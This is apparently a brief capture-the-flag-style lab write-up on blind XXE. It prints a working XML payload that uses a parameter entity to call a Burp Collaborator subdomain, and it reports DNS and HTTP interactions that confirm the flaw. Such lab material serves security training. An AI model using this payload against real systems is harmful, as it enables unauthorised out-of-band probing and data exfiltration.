
We tried the same Blind XXE attack we attempted on Lab - Blind XXE with out-of-band interaction via XML parameter entities, but received the following response:

We used the following payload to perform out-of-band interaction via XML parameter entities:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
%xxe;
]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>We inserted the Burp Collaborator payload and sent the request, but received the response as an XML error, as shown below:

After polling the collaborator, we were able to see the DNS and HTTP requests, confirming the vulnerability.

And we successfully solved the lab.
